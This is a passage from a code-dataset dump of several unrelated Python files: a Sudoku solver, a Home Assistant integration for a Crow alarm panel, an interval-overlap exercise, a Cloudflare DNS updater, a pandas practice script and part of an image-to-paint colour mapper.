3, 3, 4, 4, 4, 5, 5, 5,\r\n 3, 3, 3, 4, 4, 4, 5, 5, 5,\r\n 6, 6, 6, 7, 7, 7, 8, 8, 8,\r\n 6, 6, 6, 7, 7, 7, 8, 8, 8,\r\n 6, 6, 6, 7, 7, 7, 8, 8, 8]\r\n\r\n\r\n# correcting variable w (horizontal coordinate, from 0 to 8):\r\ndef wunder(w):\r\n underflow = True\r\n while underflow:\r\n w = w + 9\r\n if w >= 0:\r\n underflow = False\r\n return w\r\n\r\n\r\ndef wover(w):\r\n overflow = True\r\n while overflow:\r\n w = w - 9\r\n if w <= 8:\r\n overflow = False\r\n return w\r\n\r\n\r\n#######################################LOGIC#############################################\r\n# Current solving method used in the code, called \"backtracking\".\r\nunsolved = True # Defining constants outside the while loop\r\nu = 0\r\nw = 0\r\noutput = [[], [], [], [], [], [], [], [], []]\r\nstart = time.process_time()\r\nwhile unsolved: # Start of the solving loop\r\n if w <= -1:\r\n w = wunder(w)\r\n if u >= 81:\r\n break\r\n if val[u] == 0: # Check if number can be edited\r\n h = floor(u / 9)\r\n si = w + 3 * h - 3 * sl[u]\r\n str[u] += 1\r\n sectors[sl[u]][si] = str[u]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n if (sectors[sl[u]].count(str[u]) <= 1) and (col[w].count(str[u]) <= 1) and (\r\n y[h].count(str[u]) <= 1): # Check if old number + 1 is valid\r\n if str[u] >= 10: # If the number is 10, reset number to 0 and backtrack\r\n str[u] = 0\r\n sectors[sl[u]][si] = str[u]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n backtrack = True\r\n while backtrack: # Backtracking loop, until it finds a number it can change\r\n u -= 1\r\n w -= 1\r\n if val[u] == 0:\r\n backtrack = False\r\n else:\r\n continue\r\n else: # If the number is within the 3 laws and is not bigger than 10, move on to the next cell\r\n u += 1\r\n w += 1\r\n if w >= 9: # Correcting for a w bigger than 8\r\n w = wover(w)\r\n if w <= -1: # Correcting for a w smaller than 0\r\n w = wunder(w)\r\n else: # If old number + 1 doesn't abide by laws, go back to beginning of loop to add + 1\r\n u += 0\r\n w += 0\r\n else: # If cell value is not to be edited (val from list = 1) then skip and go to next cell\r\n if val[u] == 1:\r\n u += 1\r\n w += 1\r\n if w >= 9: # Correcting for a w bigger than 8\r\n w = wover(w)\r\n if w <= -1: # Correcting for a w smaller than 0\r\n w = wunder(w)\r\n if u == 81: # If it reaches the end of the sudoku str string, end the while loop\r\n unsolved = False\r\n\r\nend = time.process_time() # Recording time of end\r\nfor i in range(0, 9): # Generation of the output list to be displayed\r\n for j in range(0, 9):\r\n output[i].append(str[j + 9 * i])\r\ntimetaken = float('%.4g' % (end - start))\r\n#######################################################################################################################\r\n\r\n# Presenting output list + time taken\r\nprint('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')\r\nprint(\r\n)\r\nprint('The final answer is:')\r\nprint(\r\n)\r\nprint(*output, sep='\\n')\r\nprint(\r\n)\r\nprint(f\"with a runtime of {timetaken} seconds.\")\r\nprint(\r\n)\r\nprint('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')\r\nprint(\r\n)\r\ninput(\"Press Enter to continue...\")\r\n\r\n'''\r\n#######################################################################################################################\r\n#Guessing Logic, slow at best, inaccurate at worst.\r\nunsolved = True\r\noutput = [[],[],[],[],[],[],[],[],[]]\r\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\nsi = 0\r\ni = 0\r\nc = 0\r\nerrors = [0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\nwhile unsolved:\r\n randomize = True\r\n while randomize:\r\n \r\n if i >= 81:\r\n randomize = False\r\n correcting = True\r\n i = 0\r\n break\r\n a = int(choice(numbers))\r\n if val[i] == 0:\r\n str[i] = a\r\n sectors[sl[i]][si] = str[i]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n if (sectors[sl[i]].count(str[i]) <= 1) and (col[si].count(str[i]) <= 1) and (y[c].count(str[i]) <= 1):\r\n \r\n print(\"number assigned\")\r\n i += 1 \r\n else:\r\n str[i] = 0\r\n print(\"error\")\r\n i += 1\r\n \r\n print(\"repeat\")\r\n \r\n continue\r\n else:\r\n i += 1\r\n print(\"skipped\")\r\n #error.append(int(0))\r\n continue\r\n if i >= 81:\r\n randomize = False\r\n correcting = True\r\n i = 0\r\n break\r\n c = floor(i/9)\r\n q = i - 9*c\r\n si = q + 3*c - 3*sl[i]\r\n print(str) \r\n while correcting:\r\n if i >= 81:\r\n randomize = True\r\n correcting = False\r\n i = 0\r\n break\r\n elif val[i] == 1:\r\n i += 1\r\n elif val[i] == 0:\r\n if str[i] != 0 and((sectors[sl[i]].count(str[i]) <= 0) and (col[si].count(str[i]) <= 0) and (y[c].count(str[i])) <= 0):\r\n errors[i] = int(0)\r\n i += 1\r\n else:\r\n print(\"correcting\")\r\n str[i] = 0\r\n sectors[sl[i]][si] = str[i]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n errors[i] = int(1)\r\n i += 1\r\n \r\n c = floor(k/9)\r\n q = k - 9*c\r\n si = q + 3*c - 3*sl[k]\r\n if sum(errors) <= 0:\r\n unsolved = False\r\n print(str)\r\n \r\n\r\n\r\nfor i in range(0,9):\r\n for j in range(0,9):\r\n output[i].append(str[j + 9*i])\r\n#######################################################################################################################\r\n'''\r\n'''\r\n#######################################################################################################################\r\n#constants and related: KINDA WORKS, BUT GETS STUCK TOO EARLY\r\nunsolved = True\r\noutput = [[],[],[],[],[],[],[],[],[]]\r\nu = 0 #index of str, from 0 to 80 inclusive.\r\nq = 0 #horizontal position, from 0 to 8 inclusive\r\nc = 0 #vertical position, from 0 to 8 inclusive\r\nsi = 0 # position within a sector, from 0 to 8 inclusive\r\nwhile unsolved:\r\n if val[u] == 0: #updating and adding +1 to a changeable number\r\n str[u] += 1\r\n print(\"added +1\")\r\n sectors[sl[u]][si] = str[u]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n if (sectors[sl[u]].count(str[u]) <= 1) and (col[si].count(str[u]) <= 1) and (y[c].count(str[u]) <= 1): #checking if it abides laws\r\n if str[u] >= 10: \r\n str[u] = 0\r\n sectors[sl[u]][si] = str[u]\r\n u -= 1\r\n print(\"going back one\")\r\n else:\r\n u += 1\r\n print(\"going forward one\")\r\n \r\n if val[u] == 1:\r\n if (sectors[sl[u]].count(str[u]) <= 1) and (col[si].count(str[u]) <= 1) and (y[c].count(str[u]) <= 1): #checking if it abides laws\r\n u += 1\r\n print(\"ignoring cell and going forward one\")\r\n \r\n else:\r\n backtrack = True\r\n while backtrack:\r\n print(\"going back\")\r\n u -= 1\r\n c = floor(u/9)\r\n q = u - (9*c)\r\n si = q + 3*c - 3*sl[u]\r\n if val[u] == 0 and ((sectors[sl[u]].count(str[u]) >= 2) or (col[si].count(str[u]) >= 2) or (y[c].count(str[u]) >= 2)):\r\n backtrack = False\r\n print(\"correcting\")\r\n str[u] += 1\r\n sectors[sl[u]][si] = str[u]\r\n col = colgen(str)\r\n y = rowgen(str)\r\n if (sectors[sl[u]].count(str[u]) <= 1) and (col[si].count(str[u]) <= 1) and (y[c].count(str[u]) <= 1): #checking if it abides laws\r\n if str[u] >= 10: \r\n str[u] = 0\r\n sectors[sl[u]][si] = str[u]\r\n u -= 1\r\n print(\"going back one\")\r\n else:\r\n u += 1\r\n print(\"going forward one\")\r\n \r\n \r\n \r\n \r\n c = floor(u/9)\r\n q = u - (9*c)\r\n si = q + 3*c - 3*sl[u]\r\n if u >= 81:\r\n unsolved = False\r\n \r\n \r\nfor i in range(0,9):\r\n for j in range(0,9):\r\n output[i].append(str[j + 9*i])\r\n#######################################################################################################################\r\n'''\r\n","repo_name":"ccastrogarc/Sudoku-Solver","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":11646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"20802504720","text":"\"\"\"Crow/AAP IP Module init file\"\"\"\nimport asyncio\nimport logging\n\nimport voluptuous as vol\n\nfrom homeassistant.core import callback\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.const import EVENT_HOMEASSISTANT_STOP, CONF_TIMEOUT, CONF_HOST\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.helpers.discovery import async_load_platform\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\n\n_LOGGER = logging.getLogger(__name__)\n\nDOMAIN = \"crowipmodule\"\n\nDATA_CRW = \"crowipmodule\"\n\nCONF_CODE = \"code\"\nCONF_CROW_KEEPALIVE = \"keepalive_interval\"\nCONF_CROW_PORT = \"port\"\nCONF_AREANAME = \"name\"\nCONF_AREAS = \"areas\"\nCONF_ZONENAME = \"name\"\nCONF_ZONES = \"zones\"\nCONF_ZONETYPE = \"type\"\nCONF_OUTPUTS = \"outputs\"\nCONF_OUTPUTNAME = \"name\"\n\nDEFAULT_PORT = 5002\nDEFAULT_KEEPALIVE = 60\nDEFAULT_ZONETYPE = \"opening\"\nDEFAULT_TIMEOUT = 10\n\nSIGNAL_ZONE_UPDATE = \"crowipmodule.zones_updated\"\nSIGNAL_AREA_UPDATE = \"crowipmodule.areas_updated\"\nSIGNAL_SYSTEM_UPDATE = \"crowipmodule.system_updated\"\nSIGNAL_OUTPUT_UPDATE = \"crowipmodule.output_updated\"\nSIGNAL_KEYPAD_UPDATE = \"crowipmodule.keypad_updated\"\n\nOUTPUT_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_OUTPUTNAME): cv.string,\n }\n)\nZONE_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_ZONENAME): cv.string,\n vol.Optional(CONF_ZONETYPE, default=DEFAULT_ZONETYPE): cv.string,\n }\n)\n\nAREA_SCHEMA = vol.Schema(\n {\n vol.Required(CONF_AREANAME): cv.string,\n vol.Optional(CONF_CODE, default=''): cv.string,\n }\n)\n\n\nCONFIG_SCHEMA = vol.Schema(\n {\n DOMAIN: vol.Schema(\n {\n vol.Required(CONF_HOST): cv.string,\n vol.Optional(CONF_ZONES): {vol.Coerce(int): ZONE_SCHEMA},\n vol.Optional(CONF_AREAS): {vol.Coerce(int): AREA_SCHEMA},\n vol.Optional(CONF_OUTPUTS): {vol.Coerce(int): OUTPUT_SCHEMA},\n vol.Optional(CONF_CROW_PORT, default=DEFAULT_PORT): cv.port,\n vol.Optional(CONF_CROW_KEEPALIVE, default=DEFAULT_KEEPALIVE): vol.All(\n vol.Coerce(int), vol.Range(min=15)\n ),\n vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): vol.Coerce(int),\n }\n )\n },\n extra=vol.ALLOW_EXTRA,\n)\n\nasync def async_setup(hass, config):\n \"\"\"Set up for Crow IP Module.\"\"\"\n from pycrowipmodule import CrowIPAlarmPanel\n\n conf = config.get(DOMAIN)\n host = conf.get(CONF_HOST)\n code = '0000'\n port = conf.get(CONF_CROW_PORT)\n keep_alive = conf.get(CONF_CROW_KEEPALIVE)\n zones = conf.get(CONF_ZONES)\n areas = conf.get(CONF_AREAS)\n outputs = conf.get(CONF_OUTPUTS)\n connection_timeout = conf.get(CONF_TIMEOUT)\n sync_connect = asyncio.Future()\n\n controller = CrowIPAlarmPanel(\n host,\n port,\n code,\n keep_alive,\n hass.loop,\n connection_timeout,\n )\n\n hass.data[DATA_CRW] = controller\n\n @callback\n def connection_fail_callback(data):\n \"\"\"Network failure callback.\"\"\"\n _LOGGER.error(\"Could not establish a connection with the Crow Ip Module\")\n if not sync_connect.done():\n hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_crowipmodule)\n sync_connect.set_result(True)\n\n @callback\n def connected_callback(data):\n \"\"\"Handle a successful connection.\"\"\"\n _LOGGER.info(\"Established a connection with the Crow Ip Module\")\n if not sync_connect.done():\n hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_crowipmodule)\n sync_connect.set_result(True)\n\n @callback\n def zones_updated_callback(data):\n \"\"\"Handle zone updates.\"\"\"\n _LOGGER.debug(\"Crow Ip Module sent a zone update event. Updating zones...\")\n async_dispatcher_send(hass, SIGNAL_ZONE_UPDATE, data)\n\n @callback\n def areas_updated_callback(data):\n \"\"\"Handle area changes thrown by crow (including alarms).\"\"\"\n _LOGGER.debug(\"The Crow Ip Module sent an area update event. Updating areas...\")\n async_dispatcher_send(hass, SIGNAL_AREA_UPDATE, data)\n\n @callback\n def system_updated_callback(data):\n #Handle system updates.\n _LOGGER.debug('Crow Ip Module sent a system update event. Updating system...')\n async_dispatcher_send(hass, SIGNAL_SYSTEM_UPDATE, data)\n\n @callback\n def output_updated_callback(data):\n \"\"\"Handle output updates.\"\"\"\n _LOGGER.debug(\"Crow Ip Module sent an output update event. Updating output...\")\n async_dispatcher_send(hass, SIGNAL_OUTPUT_UPDATE, data)\n\n @callback\n def stop_crowipmodule(event):\n \"\"\"Shutdown Crow IP Module connection and thread on exit.\"\"\"\n _LOGGER.info(\"Shutting down CrowIpModule\")\n controller.stop()\n\n\n controller.callback_zone_state_change = zones_updated_callback\n controller.callback_area_state_change = areas_updated_callback\n controller.callback_system_state_change = system_updated_callback\n controller.callback_output_state_change = output_updated_callback\n\n controller.callback_connected = connected_callback\n controller.callback_login_timeout = connection_fail_callback\n\n _LOGGER.info(\"Start CrowIpModule.\")\n controller.start()\n\n result = await sync_connect\n if not result:\n return False\n\n # Load sub-components for Crow Ip Module\n if areas:\n hass.async_create_task(\n async_load_platform(\n hass,\n \"alarm_control_panel\",\n \"crowipmodule\",\n {CONF_AREAS: areas},\n config,\n )\n )\n hass.async_create_task(\n async_load_platform(\n hass,\n \"sensor\",\n \"crowipmodule\",\n {CONF_AREAS: areas},\n config,\n )\n )\n \n if zones:\n hass.async_create_task(\n async_load_platform(\n hass, \n \"binary_sensor\", \n \"crowipmodule\", \n {CONF_ZONES: zones}, \n config,\n )\n )\n\n hass.async_create_task(\n async_load_platform(\n hass, \n \"switch\", \n \"crowipmodule\", \n {CONF_OUTPUTS: outputs}, \n config,\n )\n )\n\n return True\n\n\nclass CrowIPModuleDevice(Entity):\n \"\"\"Representation of an Crow IP Module.\"\"\"\n\n def __init__(self, name, info, controller):\n \"\"\"Initialize the device.\"\"\"\n self._controller = controller\n self._info = info\n self._name = name\n\n @property\n def name(self):\n \"\"\"Return the name of the device.\"\"\"\n return self._name\n\n @property\n def should_poll(self):\n \"\"\"No polling needed.\"\"\"\n return False\n\n","repo_name":"febalci/ha_pycrowipmodule","sub_path":"custom_components/crowipmodule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"33531417941","text":"#User function Template for python3\n\nclass Solution:\n\n def findMaxGuests(self, entry, exit, n):\n entry.sort()\n exit.sort()\n ptr1 = ptr2 = 0\n count1 = 0\n maxcount = 0\n ans = 0\n while ptr1 < n and ptr2 < n:\n if entry[ptr1] <= exit[ptr2]:\n count1 += 1\n if count1 > maxcount:\n maxcount = count1\n ans = entry[ptr1]\n ptr1 += 1\n else:\n count1 -= 1\n ptr2 += 1\n return [maxcount, ans]\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n\n t = int(input())\n\n for _ in range(t):\n \n N = int(input())\n\n entry = [int(x) for x in input().split()]\n exit = [int(x) for x in input().split()]\n\n solObj = Solution()\n ans = solObj.findMaxGuests(entry, exit, N) \n print(ans[0],ans[1])\n \n\n# } Driver Code Ends","repo_name":"sandesh32/LeetCode","sub_path":"Maximum Intervals Overlap - GFG/maximum-intervals-overlap.py","file_name":"maximum-intervals-overlap.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7532715809","text":"from include import cloudflare\nimport logging\nfrom time import sleep\nimport os\n\nlogging.basicConfig(level=logging.INFO)\n\ndef get_or_revert_to_none(env_var, as_int=False):\n var = os.getenv(env_var, default=None)\n if var is None or var == \"\":\n return None\n else:\n if as_int:\n var = int(var)\n return var\n\nclass ENV_VARS:\n DOMAIN = os.getenv(\"DOMAIN\", default = None)\n PROXIED_RECORDS_RAW = os.getenv(\"PROXIED_RECORDS\", default = None)\n UNPROXIED_RECORDS_RAW = os.getenv(\"UNPROXIED_RECORDS\", default = None)\n DDNS_UPDATE_FREQ = get_or_revert_to_none(\"DDNS_UPDATE_FREQ\", as_int=True)\n DELETE_ACME_RECORDS = os.getenv(\"DELETE_ACME_RECORDS\", default = None).lower() == \"true\"\n DELETE_ACME_RECORDS_WAIT = get_or_revert_to_none(\"DELETE_ACME_RECORDS_WAIT\", as_int=True)\n\nmissing_env_vars = [k for k, v in vars(ENV_VARS).items() if not k.startswith(\"_\") and v is None]\nif missing_env_vars:\n raise Exception(f\"Missing env vars: {missing_env_vars}\")\n\nPROXIED_RECORDS = [f\"{rec}.{ENV_VARS.DOMAIN}\" for rec in ENV_VARS.PROXIED_RECORDS_RAW.split(\",\") if rec not in (ENV_VARS.DOMAIN, '')]\nUNPROXIED_RECORDS = [f\"{rec}.{ENV_VARS.DOMAIN}\" for rec in ENV_VARS.UNPROXIED_RECORDS_RAW.split(\",\") if rec not in (ENV_VARS.DOMAIN, '')] if ENV_VARS.UNPROXIED_RECORDS_RAW is not None else []\nfor rec in UNPROXIED_RECORDS:\n if rec in PROXIED_RECORDS:\n PROXIED_RECORDS.remove(rec)\n\nRECORD_NAMES_BY_PROXY_TYPE = {\n True: PROXIED_RECORDS,\n False: UNPROXIED_RECORDS\n }\n\nlogging.info(\"Proxied Items To Monitor:\\n\\t\" + \"\\n\\t\".join(RECORD_NAMES_BY_PROXY_TYPE[True]))\nlogging.info(\"Unproxied Items To Monitor:\\n\\t\" + \"\\n\\t\".join(RECORD_NAMES_BY_PROXY_TYPE[False]))\n\ndef set_dns():\n current_ip = cloudflare.get_current_ip()\n existing_records_names = [rec.name for rec in cloudflare.get_records()]\n\n # Discover new\n records_added = 0\n for proxy_enabled, record_names in RECORD_NAMES_BY_PROXY_TYPE.items():\n for record in record_names:\n if record not in existing_records_names:\n logging.info(f\"Creating DNS Record for {record}\")\n cloudflare.create_record(cloudflare.DNSRecord(dns_name=record,\n dns_ip=current_ip,\n dns_proxied=proxy_enabled))\n logging.info(f\"\\t{record} has been created.\")\n records_added += 1\n if records_added > 0:\n logging.info(f\"Added {records_added} new DNS record{'s' if records_added > 0 else ''}\")\n else:\n logging.info(\"No DNS records needed to be added\")\n\ndef delete_acme_records():\n logging.info(\"Starting acme record cleanup\")\n challenge_prefix = \"_acme-challenge.\"\n try:\n txt_records = cloudflare.get_records(type=\"TXT\")\n if txt_records > 0:\n logging.info(f\"\\t{len(txt_records)} acme challenge{'s' if txt_records > 0 else ''} exist\")\n else:\n logging.info(\"\\tNo acme challenges needed to be deleted\")\n\n for record in txt_records:\n if any(f\"{challenge_prefix}.{x}\" in record.name for x in PROXIED_RECORDS+UNPROXIED_RECORDS):\n cloudflare.delete_record(record)\n else:\n logging.info(f\"\\tSkipping {record.name}\")\n\n except Exception as e:\n logging.error(f\"Encountered exception:\\n{e}\")\n\n\ndef ddns_loop():\n while True:\n try:\n #TODO: check if proxy type accurate\n logging.info(\"Checking For DDNS Updates\")\n current_ip = cloudflare.get_current_ip()\n existing_records_by_name = {rec.name: rec for rec in cloudflare.get_records()}\n for proxy_type, rec_names in RECORD_NAMES_BY_PROXY_TYPE.items():\n for rec_name in rec_names:\n if rec_name in existing_records_by_name:\n dns_record = existing_records_by_name[rec_name]\n update_should_occur = False\n if dns_record.ip != current_ip:\n logging.info(f\"\\t{rec_name}'s IP must be updated from {dns_record.ip} to {current_ip}\")\n update_should_occur = True\n if dns_record.proxied != proxy_type:\n logging.info(f\"\\t{rec_name}'s proxy status must be updated from {dns_record.proxied} to {proxy_type}\")\n update_should_occur = True\n if update_should_occur:\n dns_record.ip = current_ip\n dns_record.proxied = proxy_type\n cloudflare.update_record(dns_record)\n logging.info(f\"\\t\\t{rec_name} has been updated.\")\n else:\n logging.info(f\"\\t{rec_name} does not need to be updated.\")\n except Exception as e:\n logging.error(f\"Encountered exception:\\n{e}\\n\\n Will attempt again next loop.\")\n logging.info(f\"Waiting {ENV_VARS.DDNS_UPDATE_FREQ} seconds till next check.\")\n sleep(ENV_VARS.DDNS_UPDATE_FREQ)\n\nif __name__ == \"__main__\":\n set_dns()\n if ENV_VARS.DELETE_ACME_RECORDS:\n sleep(ENV_VARS.DELETE_ACME_RECORDS_WAIT) # Wait X seconds for acme challenges to have been completed\n delete_acme_records() # Delete acme challenge records\n ddns_loop() # Start the DDNS IP update loop\n","repo_name":"MikeFez/SWAG-Cloudflare-DNS-Manager","sub_path":"swag_cloudflare_dns_manager/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"7614989534","text":"import os\nimport pandas as pd\nfrom pandas.tseries.offsets import BMonthEnd\nfrom datetime import datetime\nfrom Data.ET.Common_Data import BalanceSheet_Param_Dict\n\nCSV_File = os.path.join(os.path.dirname(os.path.dirname(__file__)) , 'Stock_Analysis_BalanceSheet.csv')\n# C:\\Users\\nandpara\\PycharmProjects\\Machine_Learning1\\Stock_Analysis_BalanceSheet.csv\nprint (CSV_File)\n\ndf = pd.DataFrame.from_csv(path = CSV_File)\nCol = [] # Columns only available for That Stock\ndf = df.loc[['HDFC']].dropna(axis='columns')\n# print (df)\nfor column in df.columns:\n Col.append(column)\n\nNew_DF = pd.DataFrame()\n# print (Col)\nSorted_List = sorted(set([q[:6] for q in sorted(Col)]))\nprint (Sorted_List)\nCol_Diff = []\nfor i in range(len(Sorted_List)-1):\n Mon = Sorted_List[i][:3] # Mar_\n L_Year = Sorted_List[i][4:6] #15\n h = Sorted_List[i+1]\n H_Year = h[4:6]\n for attr in BalanceSheet_Param_Dict.values():\n New_attr = Mon+\"_\"+L_Year+\"_\"+H_Year+\"_\"+attr+\"_PChg\"\n L_Column = Mon+\"_\"+L_Year+\"_\"+attr\n H_Column = Mon+\"_\"+H_Year+\"_\"+attr\n # print(L_Column , H_Column)\n Col_Diff.append(New_attr)\n df[New_attr] = ((df[H_Column] - df[L_Column])/df[L_Column]) * 100\n continue\n\n# for j in Col_Diff:\n# print(j)\n\n# for i in df[['Mar_14_Share_Capital','Mar_15_Share_Capital', 'Mar_14_15_Share_Capital_PChg']]:\n# print(i)\nprint(df['Mar_14_Share_Capital'])\nprint(df['Mar_15_Share_Capital'])\nprint(df['Mar_14_15_Share_Capital_PChg'])\n\nfor j in df.columns:\n print(j)\n\n# dt = datetime(2017, 9, 12)\n# offset = BMonthEnd()\n# T = offset.rollforward(dt)\n# print(type(T), T)","repo_name":"NandaCj/Machine_Learning1","sub_path":"Pandas_Practice/Creating_Df_From_Csv.py","file_name":"Creating_Df_From_Csv.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"32613121875","text":"#!/usr/bin/env python\n\nimport time\nimport cv2\nimport numpy as np\nimport csv\nimport os\nimport sys\nimport shutil\n\nfrom crawl_color import color_table\nfrom color_transfer import classify_table\n\ndef img_2_paint(img):\n img = cv2.imread(img)\n # shape = (217, 403, 3) -> 21.7 cm, 40.3 cm, rgb 3 colors\n shape = img.shape\n new_shape = (int(shape[0]/10), int(shape[1]/10), 3)\n print (new_shape)\n new_img = np.zeros(new_shape)\n tmp_total_r = 0\n tmp_total_g = 0\n tmp_total_b = 0\n for i in range(0, new_shape[0]):\n for j in range(0, new_shape[1]):\n for w in range(0, 10):\n for h in range(0, 10):\n tmp_total_r += img[i*10+w, j*10+h, 0]\n tmp_total_g += img[i*10+w, j*10+h, 1]\n tmp_total_b += img[i*10+w, j*10+h, 2]\n tmp_total_r = int(tmp_total_r / 100)\n tmp_total_g = int(tmp_total_g / 100)\n tmp_total_b = int(tmp_total_b / 100)\n new_img[i, j, 0] = tmp_total_r\n new_img[i, j, 1] = tmp_total_g\n new_img[i, j, 2] = tmp_total_b\n savename = \"./test/painting.png\"\n cv2.imwrite(savename, new_img)\n print (\"finished\")\n print (\"shape: \", new_img.shape)\n return (new_img)\n\ndef compare_color(img, bl_table, r_table, g_table, b_table):\n new_img = img.copy()\n #print (new_img[10, 10])\n shape = img.shape\n bl_len = len(bl_table)\n r_len = len(r_table)\n g_len = len(g_table)\n b_len = len(b_table)\n for x in range(0, shape[0]):\n for y in range(0, shape[1]):\n tmp_color = (img[x, y, 2], img[x, y, 1], img[x, y, 0]) #(b, g, r)\n #print (tmp_color)\n if (tmp_color[0] == tmp_color[1] == tmp_color[2]):\n dev_list = []\n for i in range(0, bl_len):\n dev = 0\n for p in range(0, 3):\n dev += (abs(tmp_color[p] - bl_table[i][p])*abs(tmp_color[p] - bl_table[i][p]))\n dev_list.append(dev)\n dev_min = min(dev_list)\n dev_index = dev_list.index(dev_min)\n new_color = (bl_table[dev_index][0], bl_table[dev_index][1], bl_table[dev_index][2])\n \n else:\n tmp_max = max(tmp_color)\n tmp_index = int(tmp_color.index(tmp_max))\n #print (\"tmp index: \", tmp_index)\n if (tmp_index == 2): #b\n dev_list = []\n for i in range(0, b_len):\n dev = 0\n for p in range(0, 3):\n dev += (abs(tmp_color[p] - b_table[i][p])*abs(tmp_color[p] - b_table[i][p]))\n dev_list.append(dev)\n dev_min = min(dev_list)\n dev_index = dev_list.index(dev_min)\n new_color = (b_table[dev_index][0], b_table[dev_index][1], b_table[dev_index][2])\n #print (\"dev list: \", dev_list)\n elif (tmp_index == 1): #g\n dev_list = []\n for i in range(0, g_len):\n dev = 0\n for p in range(0, 3):\n dev += (abs(tmp_color[p] - g_table[i][p])*abs(tmp_color[p] - g_table[i][p]))\n dev_list.append(dev)\n dev_min = min(dev_list)\n dev_index = dev_list.index(dev_min)\n new_color = (g_table[dev_index][0], g_table[dev_index][1], g_table[dev_index][2])\n else:\n dev_list = []\n for i in range(0, r_len):\n dev = 0\n for p in range(0, 3):\n dev += (abs(tmp_color[p] - r_table[i][p])*abs(tmp_color[p] - r_table[i][p]))\n dev_list.append(dev)\n dev_min = min(dev_list)\n dev_index = dev_list.index(dev_min)\n new_color = (r_table[dev_index][2], r_table[dev_index][1], r_table[dev_index][0])\n new_img[x, y, 0], new_img[x, y, 1], new_img[x, y, 2] = new_color[0], new_color[1], new_color[2]\n\n save_name = \"./test/final.png\"\n cv2.imwrite(save_name, new_img)\n\ndef takeFour(elem):\n return elem[3]\n\ndef paint_2_csv(img):\n img = cv2.imread(img)\n shape = img.shape\n print (\"painting shape: \", shape)\n color_r = []\n color_g = []\n color_b = []\n total_color = []\n for x in range(0, shape[0]):\n for y in range(0, shape[1]):\n tmp_list = []\n tmp_total = 0\n tmp_color = img[x, y]\n tmp_r = int(tmp_color[0])\n tmp_g = int(tmp_color[1])\n tmp_b = int(tmp_color[2])\n tmp_total = tmp_r + tmp_g + tmp_b\n tmp_list.append(tmp_r)\n tmp_list.append(tmp_g)\n tmp_list.append(tmp_b)\n tmp_list.append(tmp_total)\n if (tmp_r not in color_r):\n color_r.append(tmp_r)\n color_g.append(tmp_g)\n color_b.append(tmp_b)\n total_color.append(tmp_list)\n else:\n if (tmp_g not in color_g):\n color_r.append(tmp_r)\n color_g.append(tmp_g)\n color_b.append(tmp_b)\n total_color.append(tmp_list)\n else:\n if (tmp_b not in color_b):\n color_r.append(tmp_r)\n color_g.append(tmp_g)\n color_b.append(tmp_b)\n total_color.append(tmp_list)\n else:\n index_r = int(color_r.index(tmp_r))\n index_g = int(color_g.index(tmp_g))\n index_b = int(color_b.index(tmp_b))\n if (index_r == index_g == index_b):\n pass\n else:\n if ((color_r[index_r] == tmp_r) and (color_g[index_r] == tmp_g) \\\n and (color_b[index_r] == tmp_b)):\n pass\n elif ((color_r[index_g] == tmp_r) and (color_g[index_g] == tmp_g) \\\n and (color_b[index_g] == tmp_b)):\n pass\n elif ((color_r[index_b] == tmp_r) and (color_g[index_b] == tmp_g) \\\n and (color_b[index_b] == tmp_b)):\n pass\n else:\n color_r.append(tmp_r)\n color_g.append(tmp_g)\n color_b.append(tmp_b)\n total_color.append(tmp_list)\n \n # if ()\n # (color_r[index_r] == color_g[index_b]) or \\\n # (color_r[index_b] == color_g[index_g])):\n\n #color_r.append(tmp_r)\n #color_g.append(tmp_g)\n #color_b.append(tmp_b)\n #total_color.append(tmp_list)\n total_number = len(color_r)\n total_color.sort(key=takeFour)\n \n print (\"total color number: \", total_number)\n print (\"first color: \", total_color[1])\n print (\"second color: \", total_color[2])\n\n\n\n \n path = \"./painting\"\n try:\n if os.path.exists('./painting'):\n shutil.rmtree(path)\n os.mkdir(path)\n except:\n print (\"dir exist\")\n \n for i in range(0, total_number):\n name = path + \"/\" + str(i) + \".csv\"\n color_r = total_color[i][0]\n color_g = total_color[i][1]\n color_b = total_color[i][2]\n with open(name, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n 